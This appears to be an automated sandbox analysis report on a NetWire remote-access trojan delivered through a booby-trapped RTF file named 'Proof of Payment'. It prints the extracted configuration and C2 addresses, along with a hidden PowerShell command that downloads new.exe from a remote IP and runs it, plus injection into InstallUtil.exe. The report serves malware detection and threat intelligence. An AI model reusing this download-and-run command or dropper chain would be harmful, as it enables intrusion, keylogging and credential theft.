netwire | c4155eb3caee31efbcf7672f25c39e875b81bba26400cf0c4d4840e534491122

Analysis

max time kernel
148s
max time network
151s
platform
windows7_x64
resource
win7-20220414-en
resource tags

arch:x64arch:x86image:win7-20220414-enlocale:en-usos:windows7-x64system
submitted
15-07-2022 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Proof of Payment.rtf
Size

230KB
MD5

ccb4d123d7d23778dc3b804f8b4c551a
SHA1

6abaeacc98255a7a8048f0a62a7b983720c904da
SHA256

c4155eb3caee31efbcf7672f25c39e875b81bba26400cf0c4d4840e534491122
SHA512

0ae4ac069b843d2bb45064a29fed582970d15621135ef5b584f10d7aee6be71a049085f317161eb3980cc05efcd65d1c3aefb98c3bd1a1139286d03934367cca

Score

10^/10

netwire botnet rat stealer suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://192.3.194.246/new.exe

Extracted

Family

netwire

194.5.98.188:3364

194.5.98.188:3366

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
HostId-%Rand%
keylogger_dir
%AppData%\Logs\
lock_executable
false
offline_keylogger
true
password
j5m52xuc
registry_autorun
false
use_mutex
false

Signatures

NetWire RAT payload 12 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1880-124-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/1880-125-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/1880-123-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/1880-127-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/1880-128-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/1880-129-0x000000000040242D-mapping.dmp	netwire
behavioral1/memory/1880-132-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/1880-133-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/676-152-0x000000000040242D-mapping.dmp	netwire
behavioral1/memory/1608-168-0x000000000040242D-mapping.dmp	netwire
behavioral1/memory/676-172-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral1/memory/1608-173-0x0000000000400000-0x0000000000433000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.execmd.exepowershell.execmd.exepowershell.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1052	1048	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1504	1048	cmd.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1300	1048	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2020	1048	cmd.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1464	1048	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1160	1048	cmd.exe	WINWORD.EXE

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1052 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

new.exenew.exenew.exe

pid process

1548 new.exe
1344 new.exe
1676 new.exe
Loads dropped DLL 3 IoCs

Processes:

cmd.execmd.execmd.exe

pid process

1504 cmd.exe
2020 cmd.exe
1160 cmd.exe

flow	pid	process
4	1052	powershell.exe

pid	process
1548	new.exe
1344	new.exe
1676	new.exe

pid	process
1504	cmd.exe
2020	cmd.exe
1160	cmd.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

new.exenew.exenew.exe

description	pid	process	target process
PID 1548 set thread context of 1880	1548	new.exe	InstallUtil.exe
PID 1344 set thread context of 676	1344	new.exe	InstallUtil.exe
PID 1676 set thread context of 1608	1676	new.exe	InstallUtil.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1048 WINWORD.EXE

pid	process
1048	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenew.exenew.exenew.exe

pid	process
1052	powershell.exe
1772	powershell.exe
1300	powershell.exe
1464	powershell.exe
544	powershell.exe
1916	powershell.exe
1548	new.exe
1548	new.exe
1344	new.exe
1344	new.exe
1676	new.exe
1676	new.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exenew.exepowershell.exepowershell.exenew.exepowershell.exenew.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	1548	new.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	1344	new.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1676	new.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE

pid process

1048 WINWORD.EXE
1048 WINWORD.EXE
1048 WINWORD.EXE
1048 WINWORD.EXE

pid	process
1048	WINWORD.EXE
1048	WINWORD.EXE
1048	WINWORD.EXE
1048	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEcmd.exenew.execmd.execmd.exenew.exenew.exe

description	pid	process	target process
PID 1048 wrote to memory of 1052	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1052	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1052	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1052	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1504	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 1504	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 1504	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 1504	1048	WINWORD.EXE	cmd.exe
PID 1504 wrote to memory of 1548	1504	cmd.exe	new.exe
PID 1504 wrote to memory of 1548	1504	cmd.exe	new.exe
PID 1504 wrote to memory of 1548	1504	cmd.exe	new.exe
PID 1504 wrote to memory of 1548	1504	cmd.exe	new.exe
PID 1504 wrote to memory of 1548	1504	cmd.exe	new.exe
PID 1504 wrote to memory of 1548	1504	cmd.exe	new.exe
PID 1504 wrote to memory of 1548	1504	cmd.exe	new.exe
PID 1548 wrote to memory of 1772	1548	new.exe	powershell.exe
PID 1548 wrote to memory of 1772	1548	new.exe	powershell.exe
PID 1548 wrote to memory of 1772	1548	new.exe	powershell.exe
PID 1548 wrote to memory of 1772	1548	new.exe	powershell.exe
PID 1048 wrote to memory of 1300	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1300	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1300	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1300	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 2020	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 2020	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 2020	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 2020	1048	WINWORD.EXE	cmd.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	new.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	new.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	new.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	new.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	new.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	new.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	new.exe
PID 1048 wrote to memory of 1464	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1464	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1464	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1464	1048	WINWORD.EXE	powershell.exe
PID 1048 wrote to memory of 1160	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 1160	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 1160	1048	WINWORD.EXE	cmd.exe
PID 1048 wrote to memory of 1160	1048	WINWORD.EXE	cmd.exe
PID 1160 wrote to memory of 1676	1160	cmd.exe	new.exe
PID 1160 wrote to memory of 1676	1160	cmd.exe	new.exe
PID 1160 wrote to memory of 1676	1160	cmd.exe	new.exe
PID 1160 wrote to memory of 1676	1160	cmd.exe	new.exe
PID 1160 wrote to memory of 1676	1160	cmd.exe	new.exe
PID 1160 wrote to memory of 1676	1160	cmd.exe	new.exe
PID 1160 wrote to memory of 1676	1160	cmd.exe	new.exe
PID 1344 wrote to memory of 544	1344	new.exe	powershell.exe
PID 1344 wrote to memory of 544	1344	new.exe	powershell.exe
PID 1344 wrote to memory of 544	1344	new.exe	powershell.exe
PID 1344 wrote to memory of 544	1344	new.exe	powershell.exe
PID 1676 wrote to memory of 1916	1676	new.exe	powershell.exe
PID 1676 wrote to memory of 1916	1676	new.exe	powershell.exe
PID 1676 wrote to memory of 1916	1676	new.exe	powershell.exe
PID 1676 wrote to memory of 1916	1676	new.exe	powershell.exe
PID 1548 wrote to memory of 1880	1548	new.exe	InstallUtil.exe
PID 1548 wrote to memory of 1880	1548	new.exe	InstallUtil.exe
PID 1548 wrote to memory of 1880	1548	new.exe	InstallUtil.exe
PID 1548 wrote to memory of 1880	1548	new.exe	InstallUtil.exe
PID 1548 wrote to memory of 1880	1548	new.exe	InstallUtil.exe
PID 1548 wrote to memory of 1880	1548	new.exe	InstallUtil.exe
PID 1548 wrote to memory of 1880	1548	new.exe	InstallUtil.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Proof of Payment.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1504

C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
4⤵
PID:1880

